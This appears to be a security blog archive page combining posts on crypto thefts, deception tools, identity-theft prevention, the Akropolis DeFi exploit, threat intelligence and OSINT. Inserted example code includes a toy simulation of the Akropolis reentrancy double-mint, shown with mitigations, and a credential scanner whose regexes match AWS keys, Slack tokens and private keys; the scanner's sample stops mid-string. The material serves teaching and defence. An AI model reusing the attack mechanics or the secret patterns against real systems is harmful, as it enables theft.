Wednesday, January 15, 2025

Crystal Blockchain: Security Breaches And Fraud Involving Crypto Still High Despite Tech Development


It’s ten years since the first official cyber-terrorist attack on a crypto exchange, and despite technological advances, most cryptocurrency entities have not yet been able to develop sufficiently reliable security systems to minimize security breaches on their platforms.

Cyber-terrorists are taking more advantage of security gaps every year. Beyond security breaches, there are various types of fraudulent schemes that have provided a way for bad actors to gain value from unsuspecting victims, such as exit scams and Ponzi schemes.

Crystal has compiled a full and detailed report of all security breaches, fraudulent activity, cyber-terrorism, and scams involving cryptocurrencies between the years 2011 and 2020. 113 security attacks and 23 fraudulent schemes have so far resulted in the theft of approximately $7.6 billion worth of crypto assets in total (that’s comparable to the GDP of Monaco).

The most common locations for exchange security breaches are the United States, the United Kingdom, South Korea, Japan, and China. The largest crypto security breach thus far was the incident involving the Japanese exchange Coincheck in 2018.

The most notable type of cyber-terrorism exploits a security breach in a crypto entity’s internal security systems, resulting in illegal access to the service’s hot wallets.

Over the coming months and years, as the number of blockchains keeps growing and the methods and technologies used by fraudsters become more sophisticated, we can assume that the number of cyber-terrorist attacks will also continue to grow.


Deception tools and how they ensnare attackers


Featuring TrapX, Fidelis Deception, Attivo and Acalvio Shadowplex

Deception tools have come a long way in a few years and can now more closely emulate real network activity and help security teams identify and stop attacks.

A few years ago, many deception technology companies were in the process of adding advanced features like cloud integration, artificial intelligence (AI) and automation to their platforms to combat increasingly advanced threats. The upgraded defences were necessary because skilled attackers were starting to unmask and circumvent classic deception tricks like dropping breadcrumbs pointing at fictitious, static assets. Today, deception technology again has the upper hand and can deploy a labyrinth of realistic-looking but fake assets that act very much like the real thing.

The upgraded effort to lure and ultimately ensnare even the most advanced hackers is being led by several companies with deception platforms at the forefront of this still-emerging technology. The following are four of the most advanced and innovative deception tools available today.

Acalvio Shadowplex

The Shadowplex platform from Acalvio was designed from the ground up for use in enterprise environments. The company does not just look at typical IT devices like computers, printers and file servers as part of that potential enterprise. Shadowplex can also protect internet of things (IoT) sensors and devices, and even industrial control centers that make up much of the operational technology (OT) landscape.

In the case of both IoT and OT devices, having a layer of deception technology to protect them is critical because many have limited or no native security on their own. This also makes it a good choice for something like a healthcare environment, where it can mimic things like desktop computers alongside medical devices, luring attackers into either one, depending on their interest.

Being able to protect IoT and OT is impressive, but what is remarkable about Shadowplex is how it handles massive deception deployments at scale without using too many resources. The secret is that all the deception assets exist inside what it calls a deception farm, which can be located inside the cloud or on-premises in a virtualized server farm. To connect back to the physical network requires a series of sensors that act as the endpoint for a software tunnel. The sensors don’t need to be powerful or expensive. A £50 network appliance will work just fine, or they can also be software based and virtualized. You need one for every network segment that you are protecting.

Shadowplex works by deploying virtual, deceptive assets in the network they will be protecting. These assets can be deployed automatically based on the host environment, with Shadowplex picking a good mix of operating systems, IT, OT and IoT devices as appropriate. The deception assets can talk with one another and generate traffic, but are actually interacting only within the deception farm, with those results mimicked in the real environment.

Although they are technically facades, as soon as an adversary interacts with one, the AI-driven control center in the deception farm immediately spins the deception asset up fully, helping it to perform just like an attacker would expect a desktop, printer or industrial control device to act. It will keep the attacker busy for as long as possible, while alerting security teams about the attack. Shadowplex will also present situations to the attacker to learn more about their intentions and tactics, which is great not only for mitigating the current threat but also in keeping them out in the future.

Finally, you don’t need to be a deception expert to work with Shadowplex. Surprisingly helpful wizards in the program will do a user’s bidding in response to simple questions and direction. For such a powerful platform, having such an effortless interface is a real strength.

Attivo ThreatDefend Deception and Response Platform

Attivo was one of the first deception technology developers to add response capability to its product, and the company has pushed that even more with its new Attivo ThreatDefend Deception and Response Platform. It can now be deployed on-premises, in the cloud, in data centers or in hybrid networks. The company is constantly developing deception assets based on new devices and offers to craft unique deceptions if a customer has something exclusive inside their environment. All deployed decoys appear to be real assets that are being used within the network.

The goal of the Attivo platform is the same as other deception toolsets, which is to deploy fake assets that attackers will interact with, but which actual users will either not know about or have no cause to ever touch. Some of the decoys are a little more public than others, which can help to ferret out insider threats or snooping employees. For the most part, deception assets are designed to catch threat actors creeping through a network and trying to map out a path further inside, escalate their privileges, move laterally or outright steal data.

Once an attacker interacts with one of Attivo’s deceptive assets, it does more than just generate an alert, though it does that, too. It also interacts with an attacker, sending back the kinds of responses that the invader might expect. It can activate a sandbox, so that any malware or hacking tools uploaded by an attacker go into the sandboxed environment. This not only protects the network, but also allows for examining the malware to determine the attacker’s intent and tactics.

The platform also allows administrators to take various actions, like quarantining a system that is being used as a launch platform by an attacker or expiring the credentials of a compromised user. Once users begin to trust the platform, those actions can be set to happen automatically once any important threat intelligence is collected.

The Attivo Deception and Response Platform not only provides good deception technology, but also helps defenders get a jump start on their response capabilities, an important advantage in a world where seconds count.

Fidelis Deception

Managing any enterprise network is hard work. Putting a layer of fake or deceptive assets on top of that makes it even more difficult. Things can get a lot easier if users employ the Fidelis Deception platform, which automates most of the more onerous aspects of defenses based on deception.

You can walk through the process of deception asset deployment with easy-to-use wizards and drop-down menus, or simply have Fidelis automate everything. It does a great job of deploying assets that match whatever else is in the environment. It will keep monitoring a network as it evolves and expands, making suggestions as to how to mirror those changes in the deception network. For example, if a company adds a bunch of new IoT security cameras, Fidelis will detect that and offer to deploy a bunch of fake cameras with similar characteristics. It fully supports almost any IoT device and many found within OT as well.

Beyond easy deployment, Fidelis also controls its fake assets, having them communicate with one another and perform actions that a normal device of the same type would undertake. It even commences some surprisingly advanced tactics like poisoning the Address Resolution Protocol (ARP) table to make it look like deceptive assets are just as active as the real ones they are protecting.

Finally, Fidelis is unique in that it also spawns fake users that interact with deceptive assets in realistic ways. A hacker trying to determine if an asset is real will see evidence of users interacting with it and let their guard down, not knowing that the users themselves are part of the elaborate deception.

TrapX DeceptionGrid 7.0

The DeceptionGrid platform from TrapX continues to be one of the most robust deception defense programs, especially in terms of the number of realistic but fake assets that it can deploy. It’s not unusual for DeceptionGrid to deploy thousands upon thousands of fake assets on a network it is protecting, though that does not necessarily mean that each one is a fully functioning deceptive device.

The deceptive assets deployed by DeceptionGrid include normal network devices, deception tokens and active traps. Starting with the bulk of most deployments, the main deceptive assets are designed to seem like fully functioning computers or devices, and TrapX has several templates designed for specific industries like the financial sector or healthcare. It can mimic everything from an automatic teller machine to a point of sale device to almost any IoT asset. In addition, DeceptionGrid can deploy deceptive assets with complete operating systems. Called FullOS traps, they are designed to allow an attacker to believe that they are working with a real asset, while fully monitoring everything they are doing to gather threat intelligence.

Smaller but just as important are the deception tokens deployed by TrapX. Unlike the fully functional deceptive assets, tokens are simply ordinary files, configuration scripts and other kinds of lures that attackers use to gather information about the systems and networks they are trying to compromise. They won’t interact with an attacker, but will alert security teams whenever they are accessed, copied or viewed.

Active traps round out the volume of deceptive assets deployed by DeceptionGrid. These traps stream volumes of fake network traffic among themselves, with pointers and clues leading back to the rest of the deception network. Any attacker who is quietly monitoring network traffic is likely to be deceived by the bogus network stream, which will lead them right to a deceptive asset even though they probably assume it’s safe since it looks like it’s in regular and full use within the network.

If you want to blanket your network with an army of deceptive assets for total protection, nothing can help achieve that goal better than the TrapX DeceptionGrid. It’s not exactly subtle, but there is almost no way for an attacker to successfully navigate through the complex maze of diverse deception assets that DeceptionGrid can deploy.


What is identity theft? and 5+ Ways to prevent it


Identity theft has taken on a whole new life in the digital age and our data has become a valuable commodity that can be monetised and used to commit fraudulent activities.

Data breaches are happening on an almost daily basis, and identity theft is the main driver behind all attacks, accounting for 65% of breaches and over 3.9 billion of the compromised data records this year.

It’s become a big business that’s costing the global economy an estimated £3.2 trillion a year and according to recent research from Cifas, the number of identity theft victims has risen by 57% in the last year alone.

If criminals can get hold of your name, address, phone number or banking details, they can then use this information to steal your identity and commit fraud. Typically, this information will be used to open accounts, apply for loans, or they may even try to obtain a driving licence or passport using this stolen data.

Criminals may be able to gather a large amount of this information from bank statements or paper documents, but increasingly the easiest way for them to gain access to this priceless data is by going online.

It’s unbelievable how much information the criminals can extract from social media platforms or how easy we make it to break into our accounts by choosing passwords that could be hacked within minutes.

Tips To Prevent Identity Theft

Thankfully there are a number of steps you can take to keep your data safe and prevent identity theft.

1. Use strong passwords


Creating a strong password is the first line of defence in preventing identity theft. One of the easiest ways for criminals to hack into your accounts and steal personal and financial information is to guess passwords. If they can successfully crack the password for just one of your accounts, there’s a good chance they can hack multiple accounts using the same details.

A strong password should be between 8-15 characters long, a mix of uppercase and lowercase letters and include numbers or symbols. For extra security, a passphrase can be created which is a password composed of a sentence or combination of words. The first letter of each word will form the basis of the password and letters can be substituted with numbers and symbols to make it more difficult to crack.

Let’s look at some examples of good vs. bad passwords.

  • Corrupted100 – BAD
  • Corrupted123 – BAD
  • LondonJohn100 – BAD
  • not!C0rupt3d!()()%!100! – GOOD
  • C0rupt3d!RiSec%!100! – GOOD
  • L0Nd0n$John!1$0%0! – GOOD

Okay, you get the idea: avoid dictionary-type passwords, real-world names and patterns. Substitute symbols for letters, follow letters with symbols, and so on. At the very least, aim to have symbols at the beginning or end of your password. Passwords that take no effort to memorize are always a bad idea.
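The passphrase method and the good-vs-bad rules above, as an added example (not from the original article): `passphrase_to_password` builds a password from the first letter of each word plus substitutions, and `password_problems` applies the article’s checks to the page’s own examples. The wordlist and the sample passphrase are constructed.

```python
import string

SYMBOLS = set(string.punctuation)

# Constructed stand-in for a cracker's wordlist; the article's BAD examples
# are built from these words and names.
COMMON_WORDS = ("corrupted", "london", "john", "password", "welcome")


def passphrase_to_password(sentence, substitutions, wrap=""):
    """Build a password the way the article describes: take the first letter
    of each word, swap some letters for digits or symbols, and optionally put
    a symbol at both ends."""
    initials = "".join(w[0] for w in sentence.split() if w[0].isalnum())
    swapped = "".join(substitutions.get(ch, ch) for ch in initials)
    return f"{wrap}{swapped}{wrap}"


def _has_sequence(pw):
    """True for runs like 'abc', '321' or 'aaa' anywhere in the password."""
    codes = [ord(c) for c in pw.lower()]
    for a, b, c in zip(codes, codes[1:], codes[2:]):
        if b - a == c - b and abs(b - a) in (0, 1):
            return True
    return False


def _dictionary_coverage(pw):
    """Fraction of the password made up of wordlist words or names."""
    low = pw.lower()
    covered = sum(len(w) * low.count(w) for w in COMMON_WORDS if w in low)
    return covered / len(pw) if pw else 0.0


def password_problems(pw):
    """Return the article's objections to a password; an empty list means it
    passes every check (length, character mix, edge symbols, patterns, words)."""
    problems = []
    if len(pw) < 8:
        problems.append("shorter than 8 characters")
    if not any(c.isupper() for c in pw):
        problems.append("no uppercase letter")
    if not any(c.islower() for c in pw):
        problems.append("no lowercase letter")
    if not any(c.isdigit() for c in pw):
        problems.append("no digit")
    if not any(c in SYMBOLS for c in pw):
        problems.append("no symbol")
    if pw and pw[0] not in SYMBOLS and pw[-1] not in SYMBOLS:
        problems.append("no symbol at the beginning or end")
    if _has_sequence(pw):
        problems.append("contains a sequence or repeated run such as 123")
    if _dictionary_coverage(pw) >= 0.5:
        problems.append("mostly a dictionary word or a name")
    return problems


if __name__ == "__main__":
    for candidate in ("Corrupted100", "Corrupted123", "LondonJohn100",
                      "not!C0rupt3d!()()%!100!", "C0rupt3d!RiSec%!100!", "L0Nd0n$John!1$0%0!"):
        verdict = password_problems(candidate)
        print(candidate, "->", "GOOD" if not verdict else "BAD: " + "; ".join(verdict))
    # Constructed passphrase: "My dog Rex eats two bones every single morning"
    derived = passphrase_to_password("My dog Rex eats two bones every single morning",
                                     {"e": "3", "s": "$", "o": "0"}, wrap="!")
    print(derived, "->", password_problems(derived) or "GOOD")
```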

2. Check ALL social media privacy settings


Social Media is great for catching up with friends however by oversharing online, you can put yourself at great risk of identity theft or even a home burglary. Criminals can collect a huge amount of data about you from your social media profiles.

Whether you’re on Instagram, Facebook, Twitter or LinkedIn, check the site’s privacy policy and use security and privacy settings to control who can see your personal information. Be careful who you accept friend requests from and try not to share too much information that could reveal where you live, when you’re away on a holiday or any other personal data that could compromise your identity.

3. Avoid phishing emails online

[Image: sample phishing email that appears to come from PayPal]

The example above is of course fake. Look at the “From” field: it may say PayPal, but look further at the Reply-To address and the actual sender address.

Phishing continues to be one of the most popular ways for criminals to steal personal information and commit identity fraud.

Phishing emails are carefully designed to trick you into entering confidential information such as an account number, password or date of birth by clicking on a link. The email may also include an attachment that once opened will directly infect your computer with malware.

Despite appearing legitimate, there are often a number of red flags that may point to a phishing email. These include: a mismatched URL, poor spelling and grammar, requests for sensitive information, unexpected correspondence and the use of threatening or urgent language.
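The red flags above, checked programmatically: an added example (not from the original article) that parses a raw e-mail and reports a Reply-To domain that differs from the sender, a display name that does not match the sender domain, a mismatched link, urgent wording and requests for sensitive data. The sample message, its domains and the phrase lists are constructed.

```python
import email
import re
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

URGENT_PHRASES = ("account will be suspended", "within 24 hours", "act now")
SENSITIVE_REQUESTS = ("password", "date of birth", "account number", "confirm your details")

# Constructed sample in the spirit of the article's screenshot: "PayPal" in the
# display name, but the sender, Reply-To and link all lead elsewhere.
SAMPLE_EMAIL = """\
From: "PayPal Service" <service@paypa1-secure.example>
Reply-To: refunds@mail-collect.example
To: victim@example.org
Subject: Your account will be suspended
Content-Type: text/html; charset=utf-8

<p>Please visit <a href="http://login.mail-collect.example/verify">www.paypal.com</a>
to confirm your details within 24 hours.</p>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def domain_of(address):
    """Mailbox domain of a header value such as '"Name" <user@host>'."""
    return parseaddr(str(address))[1].rpartition("@")[2].lower()


def registrable(host):
    """Crude 'last two labels' reduction; enough to compare hosts here."""
    return ".".join(host.lower().split(".")[-2:])


def phishing_flags(raw):
    """Return a list of red-flag descriptions found in the raw message."""
    msg = email.message_from_string(raw, policy=policy.default)
    flags = []
    from_dom = domain_of(msg.get("From", ""))
    reply_dom = domain_of(msg.get("Reply-To", ""))
    if reply_dom and registrable(reply_dom) != registrable(from_dom):
        flags.append(f"reply-to domain {reply_dom} differs from sender domain {from_dom}")
    # Display name words (e.g. "PayPal") should appear in the real sender domain.
    words = [w for w in parseaddr(str(msg.get("From", "")))[0].lower().split() if len(w) > 3]
    if words and not any(w in from_dom for w in words):
        flags.append(f"display name does not match sender domain {from_dom}")
    part = msg.get_body(preferencelist=("html", "plain"))
    body = part.get_content() if part else ""
    collector = LinkCollector()
    collector.feed(body)
    for href, text in collector.links:
        href_host = urlparse(href).hostname or ""
        text_host = ""
        if "." in text and " " not in text:  # link text that looks like a host or URL
            text_host = urlparse(text if "://" in text else "//" + text).hostname or ""
        if href_host and text_host and registrable(href_host) != registrable(text_host):
            flags.append(f"link text shows {text_host} but points at {href_host}")
    text = (str(msg.get("Subject", "")) + " " + re.sub(r"<[^>]+>", " ", body)).lower()
    hits = [p for p in URGENT_PHRASES if p in text]
    if hits:
        flags.append("urgent or threatening language: " + ", ".join(hits))
    asks = [p for p in SENSITIVE_REQUESTS if p in text]
    if asks:
        flags.append("asks for sensitive information: " + ", ".join(asks))
    return flags


if __name__ == "__main__":
    for flag in phishing_flags(SAMPLE_EMAIL):
        print("-", flag)
```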

4. Avoid all public Wi-Fi where possible

This is probably one of the least-noted privacy and identity theft risks.

There’s no doubt that using public Wi-Fi is a quick, convenient, and free way to go online, however, it opens us up to a range of security risks that can ultimately lead to identity theft.

Public Wi-Fi requires no authentication to establish a network connection, allowing criminals direct access to any unsecured devices on the same open network. Unsecured Wi-Fi networks may also be used to spread malware allowing criminals unrestricted access to everything on your device. This information can, in turn, be used to commit identity fraud, or the information can be sold on to criminal third parties.

5. Check all bank statements regularly

It’s worth keeping a close eye on bank statements to make sure there are no unusual transactions on your account. To avoid detection, criminals will often make a few small initial debits, then make a much larger debit which could ultimately clean out your bank account. If you notice any suspicious activity on your account, you should report it to your bank or financial services provider immediately.

6. Always use secure websites


The easiest way to check if the site you are on is secure is to check the URL. At the start of all web addresses, you will see either a ‘http’ or a ‘https’. Always use a site that starts with https as the ‘s’ stands for secure and ensures that all communication between your browser and the website you are visiting is encrypted. This system is not totally foolproof but it will add an extra layer of security and reduce the chance of your data falling into the wrong hands.

7. Ensure AV security software is kept up to date


The installation of anti-virus software will help detect threats on your computer and block unauthorised users from gaining access. It’s also important to ensure that your software is regularly updated to prevent cybercriminals from gaining access to your computer through vulnerabilities in older and outdated systems. Regular software updates will ensure that you have the most up to date versions released by the manufacturer, thereby reducing your chance of attack.

8. Shred sensitive documents


Your personal information is what identity thieves are after and gaining access to the paper copies of your bank statements, payslips or any other mail that may contain personally identifiable information is one of the easiest ways for them to steal this data. Always shred and properly dispose of any sensitive information to ensure it can’t be used to identify you and commit fraud.


$2 million stolen in Akropolis DeFi exploit


On Thursday, November 12th, the DeFi platform Akropolis–which allows users to earn interest on deposits as well as borrow–was the victim of an exploit that resulted in roughly $2 million in stolen funds. The attacker, who has not been identified yet, was able to exploit Akropolis by taking out flash loans and making use of a flaw within the Akropolis smart contract.

The attacker was able to make off with roughly $2 million worth of the stablecoin DAI by draining Akropolis’s YCurve and sUSD pools. The stolen funds are currently sitting in a wallet that has already been marked as “the Akropolis hackers wallet”.

How it happened

According to Akropolis’s post-mortem report,

The hacker created a flash-loan to borrow funds, then called SavingsModule.deposit() with a fake token (his own contract 0xe2307837524db8961c4541f943598654240bd62f).

During “transferFrom” of this fake token, he executed another deposit with real 800k DAI borrowed from DyDx.

The balance of the pool was actually increased during the first deposit and as a result, our PoolTokens were minted twice.

Thus he was able to withdraw almost double the amount.

What’s unique about the Akropolis exploit is that, unlike many of the other DeFi projects in the space, Akropolis claims to have been independently audited twice. Regardless, Akropolis Founder and CEO Ana Andrianova says that the two attack vectors exploited to pull off this attack were missed during the audits.

Shortly after the attack took place, Akropolis halted trading in all of its stablecoin pools, informed digital currency exchanges of the exploit, and put its development team and security specialists to work on a patch.
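The double-mint described in the post-mortem, as an added toy simulation (not Akropolis code; the class and account names are constructed): the pool mints shares from the DAI balance change observed across an external transferFrom call, so a token contract that calls back into deposit with the real 800k DAI gets that one deposit counted twice. Two mitigations are shown side by side: a nonReentrant-style guard and an allow-list of accepted tokens.

```python
class Ledger:
    """Minimal ERC-20-style balance book standing in for real DAI (constructed)."""

    def __init__(self, balances):
        self.balances = dict(balances)

    def balance_of(self, who):
        return self.balances.get(who, 0)

    def transfer_from(self, sender, recipient, amount):
        if self.balance_of(sender) < amount:
            raise ValueError("insufficient balance")
        self.balances[sender] -= amount
        self.balances[recipient] = self.balance_of(recipient) + amount


class Pool:
    """SavingsModule-like pool: mints shares equal to the DAI balance increase
    seen across the token's transferFrom call (the vulnerable accounting)."""

    ADDRESS = "pool"

    def __init__(self, dai, guarded=False, allowed_tokens=None):
        self.dai = dai
        self.guarded = guarded                # mitigation 1: reentrancy guard
        self.allowed_tokens = allowed_tokens  # mitigation 2: accept only known tokens
        self.shares = {}                      # PoolToken balances per user
        self._entered = False

    def deposit(self, user, token, amount):
        if self.allowed_tokens is not None and token not in self.allowed_tokens:
            raise ValueError("token not accepted by the pool")
        if self.guarded and self._entered:
            raise RuntimeError("reentrant deposit rejected")
        self._entered = True
        try:
            before = self.dai.balance_of(self.ADDRESS)
            token.transfer_from(user, self.ADDRESS, amount)  # external call, can re-enter
            after = self.dai.balance_of(self.ADDRESS)
            minted = after - before
            self.shares[user] = self.shares.get(user, 0) + minted
            return minted
        finally:
            self._entered = False


class ReenteringToken:
    """Stand-in for the fake token contract: its transferFrom moves nothing and
    instead calls back into the pool with the real, flash-loaned DAI."""

    def __init__(self, pool, dai, real_amount):
        self.pool, self.dai, self.real_amount = pool, dai, real_amount

    def transfer_from(self, sender, recipient, amount):
        self.pool.deposit(sender, self.dai, self.real_amount)


def run_scenario(guarded=False, allowlist=False):
    """Replay the sequence under a chosen mitigation. Returns the outcome, the
    shares minted to the depositor, and the DAI the pool actually holds."""
    dai = Ledger({"attacker": 800_000})  # the 800k DAI figure from the post-mortem
    pool = Pool(dai, guarded=guarded, allowed_tokens=[dai] if allowlist else None)
    fake = ReenteringToken(pool, dai, 800_000)
    try:
        pool.deposit("attacker", fake, 1)
        outcome = "minted"
    except (RuntimeError, ValueError) as err:
        outcome = f"reverted: {err}"  # on-chain, the whole transaction reverts
    return outcome, pool.shares.get("attacker", 0), dai.balance_of(Pool.ADDRESS)


if __name__ == "__main__":
    print("vulnerable:", run_scenario())              # 1,600,000 shares for 800,000 DAI
    print("guarded:   ", run_scenario(guarded=True))
    print("allow-list:", run_scenario(allowlist=True))
```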

The DeFi death toll rises

Several DeFi exploits have taken place in 2020. According to blockchain analytics firm CipherTrace, DeFi-related thefts and hacks are on the rise while digital currency crime in general is declining.

When it comes to DeFi, you must proceed with caution and research thoroughly before investing. The DeFi ecosystem is very new, which means that there are several unexplored attack vectors and bugs waiting to be exploited. To add insult to injury, several DeFi projects do not get their code audited and launch with insecure infrastructure; and as we see with the Akropolis exploit, even if a project does get its code audited, that does not guarantee it will be bullet-proof.


The 4 Types of Threat Intelligence Vendors


Key Takeaways

  • Not all threat intelligence services and providers are created equal.
  • We can categorize threat intelligence vendors into four fairly broad categories.
  • Vendors make use of human analysts, automation, and machine learning in different ways — look for a vendor whose capabilities align with your goals.

As threat intelligence continues its rapid rise to the top of wish lists for security teams, there remains considerable confusion about what you actually get when purchasing threat intelligence. There are a plethora of offerings from a variety of companies, including traditional endpoint and perimeter security players, security service providers, and a new breed of specialist threat intelligence vendors. But not all of these products are created equal, and some are designed solely to answer very specific use cases.

In this post, we’ll broadly categorize some of these vendors based on the way they deliver or organize threat-related content. If you want to find out more about specific use cases for threat intelligence, including vendor capabilities, you can download a free copy of Gartner’s “Market Guide for Security Threat Intelligence Products and Services.”

So, let’s take a look at what you can get for your investment in threat intelligence and how it should be a central component in an effective information security strategy.

Human Intelligence Services and Providers

These services have their roots in the military tradition of human intelligence (HUMINT). Originally HUMINT was intelligence gathered by humans from humans, but now this process has evolved into humans collecting and analyzing data from human and machine sources to surface information on emerging and ongoing threats — in this case, cyber threats. For example, human analysts may work from an initial incident to build a picture of the techniques, tactics, and procedures (TTPs) that threat actors use to provide an intelligence report that could be useful to other organizations that could be affected.

These reports are usually rich in detail, full of indicators, and will be uploaded to an online, searchable database for users to access. The drawback with this type of intelligence is that traditionally, reports need to be researched using data manually gathered from a range of disparate sources (open web, deep web, and dark web), which means they can take significant time to produce. Time is at a premium for organizations looking to avoid becoming the victim of a breach. Leading service providers will make use of advanced analytics and machine-learning techniques to increase the efficiency of analysts so that reports can be produced faster without losing vital context.

Threat Data Feed Providers

Threat data feeds are seen by many organizations as a starting point for a threat intelligence program as there are a number of open source feeds you can subscribe to. Data feeds provide potential threat indicators like IP addresses, domains, and file hashes.

The challenge is that, although this data arrives quickly (checking a box for real time), there’s no context to these indicators. This data on its own cannot answer vital questions: Are indicators connected to attacks on particular industries or technologies? What part do they play in a malicious infrastructure? Are they related to a specific type of malware? The only way to get this kind of vital context and actually generate relevant intelligence is to look for connections in the data, which in most cases is a very time-consuming and manual process. Vendors who can bring together feeds into a single solution and add context to data from feeds automatically will enable you to get the maximum value from this kind of threat content.

Threat Intelligence Platforms

Threat intelligence platforms help to organize many feeds of threat data (up to thousands, in fact) into single containers. The platforms let you configure alerts on the data from feeds and make it more consumable by removing duplicate entries and enabling you to prioritize the sources of data. The most tangible advantage a platform has over using threat feeds alone is that it allows you to bring any source of threat data you have access to into a central view, and allows you to integrate this with other security products like SIEMs or incident response platforms.

However, you do still have to configure all those feeds in the first place, and there may not be any real analysis of that data before it reaches a person.

Ultimately, a threat intelligence platform will only ever be as good as the data you put into it. Without real context around indicators, security teams will struggle to investigate every single alert, quickly realize it isn’t possible, and risk not responding to alerts altogether.

Complete Threat Intelligence Solution

A complete threat intelligence solution draws together the capabilities of providers, feeds, and platforms, with all of these pieces allowing you to get the most from available intelligence. Crucially, a threat intelligence solution should collect data from a wide breadth of sources, including threat data feeds, to deliver a real-time view.

You would also expect automation and machine-learning capabilities that automatically connect the dots and add context across all of these sources to give you contextualized threat content. This kind of technology also supports the human analysts a solution provides, so finished intelligence is produced faster.

A complete solution like this will have the capability to centralize any source of threat data you have access to and let you customize that intelligence for integration with other parts of your security infrastructure.

The significant advantages of this approach are obvious — you can make use of technology that balances fast access to data with the context that makes for true threat intelligence, and you can stick with a single vendor who can meet your threat intelligence needs as they grow.


Open Source Intelligence (OSINT): What Is It and How Is It Used?


Key Takeaways

  • Open source intelligence is derived from data and information that is available to the general public. It’s not limited to what can be found using Google, although the so-called “surface web” is an important component.
  • As valuable as open source intelligence can be, information overload is a real concern. Most of the tools and techniques used to conduct open source intelligence initiatives are designed to help security professionals (or threat actors) focus their efforts on specific areas of interest.
  • There is a dark side to open source intelligence: anything that can be found by security professionals can also be found (and used) by threat actors.
  • Having a clear strategy and framework in place for open source intelligence gathering is essential — simply looking for anything that could be interesting or useful will inevitably lead to burnout.

Of all the threat intelligence subtypes, open source intelligence (OSINT) is perhaps the most widely used, which makes sense. After all, it’s mostly free, and who can say no to that?

Unfortunately, much like the other major subtypes — human intelligence, signals intelligence, and geospatial intelligence, to name a few — open source intelligence is widely misunderstood and misused.

In this blog, we’re going to cover the fundamentals of open source intelligence, including how it’s used, and the tools and techniques that can be used to gather and analyze it.

What Is Open Source Intelligence?

Before we look at common sources and applications of open source intelligence, it’s important to understand what it actually is.

According to U.S. public law, open source intelligence:

  • Is produced from publicly available information
  • Is collected, analyzed, and disseminated in a timely manner to an appropriate audience
  • Addresses a specific intelligence requirement

The important phrase to focus on here is “publicly available.”

The term “open source” refers specifically to information that is available for public consumption. If any specialist skills, tools, or techniques are required to access a piece of information, it can’t reasonably be considered open source.

Crucially, open source information is not limited to what you can find using the major search engines. Web pages and other resources that can be found using Google certainly constitute massive sources of open source information, but they are far from the only sources.

For starters, a huge proportion of the internet (over 99 percent, according to former Google CEO Eric Schmidt) cannot be found using the major search engines. This so-called “deep web” is a mass of websites, databases, files, and more that (for a variety of reasons, including the presence of login pages or paywalls) cannot be indexed by Google, Bing, Yahoo, or any other search engine you care to think of. Despite this, much of the content of the deep web can be considered open source because it’s readily available to the public.

In addition, there’s plenty of freely accessible information online that can be found using online tools other than traditional search engines. We’ll look at this more later on, but as a simple example, tools like Shodan and Censys can be used to find IP addresses, networks, open ports, webcams, printers, and pretty much anything else that’s connected to the internet.

Information can also be considered open source if it is:

  • Published or broadcast for a public audience (for example, news media content)
  • Available to the public by request (for example, census data)
  • Available to the public by subscription or purchase (for example, industry journals)
  • Able to be seen or heard by any casual observer
  • Made available at a meeting open to the public
  • Obtained by visiting any place or attending any event that is open to the public

At this point, you’re probably thinking, “Man, that’s a lot of information …”

And you’re right. We’re talking about a truly unimaginable quantity of information that is growing at a far higher rate than anybody could ever hope to keep up with. Even if we narrow the field down to a single source of information — let’s say Twitter — we’re forced to cope with hundreds of millions of new data points every day.

This, as you’ve probably gathered, is the inherent trade-off of open source intelligence.

As an analyst, having such a vast quantity of information available to you is both a blessing and a curse. On one hand, you have access to almost anything you might need — but on the other hand, you have to be able to actually find it in a never-ending torrent of data.

How Is Open Source Intelligence Used?

Now that we’ve covered the basics of open source intelligence, we can look at how it is commonly used for cybersecurity. There are two common use cases:

1. Ethical Hacking and Penetration Testing

Security professionals use open source intelligence to identify potential weaknesses in friendly networks so that they can be remediated before they are exploited by threat actors. Commonly found weaknesses include:

  • Accidental leaks of sensitive information, like through social media
  • Open ports or unsecured internet-connected devices
  • Unpatched software, such as websites running old versions of common CMS products
  • Leaked or exposed assets, such as proprietary code on pastebins
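The last item in that list is the one a defender can check for mechanically. The following is an added example, not code from the original post: a small scanner that runs credential-format rules over pasted text, with an entropy filter so that placeholder passwords are not reported. The rules cover a few publicly documented formats (AWS access key IDs, Slack tokens, PEM private-key headers, generic password assignments); the sample paste is constructed for this example, and the AWS key in it is AWS's own documented placeholder rather than a live credential.

```python
"""Scan pasted text for credential-like strings.

Added example, not code from the original post. The sample paste below is
constructed; the AWS key in it is the documented placeholder value.
"""
import math
import re
from collections import Counter

# (rule name, regex); group 1 captures the candidate secret.
RULES = [
    ("aws_access_key_id", re.compile(r"\b(AKIA[0-9A-Z]{16})\b")),
    ("slack_token", re.compile(r"\b(xox[baprs]-[0-9A-Za-z-]{10,})\b")),
    ("private_key_block", re.compile(r"(-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----)")),
    ("generic_password_assignment",
     re.compile(r"(?i)(?:password|passwd|pwd)\s*[=:]\s*['\"]([^'\"\s]{8,})['\"]")),
]

# Values that look like assignments but are obviously placeholders.
PLACEHOLDERS = {"changeme", "password", "example", "xxxxxxxx"}


def shannon_entropy(s: str) -> float:
    """Bits per character. Random secrets score around 4 or more; dictionary words score lower."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def scan_text(text: str, min_entropy: float = 3.0) -> list:
    """Return findings as dicts: rule, 1-based line number, matched value.

    Structured tokens (AWS, Slack, PEM) are reported whenever the format matches.
    Generic password assignments are only reported when the value is not a known
    placeholder and its entropy is at least min_entropy, which removes most
    "changeme"-style false positives.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES:
            for match in pattern.finditer(line):
                value = match.group(1)
                if rule == "generic_password_assignment" and (
                    value.lower() in PLACEHOLDERS or shannon_entropy(value) < min_entropy
                ):
                    continue
                findings.append({"rule": rule, "line": lineno, "value": value})
    return findings


# Constructed sample: the kind of snippet that ends up on a paste site.
SAMPLE_PASTE = """\
# deploy.py (constructed sample)
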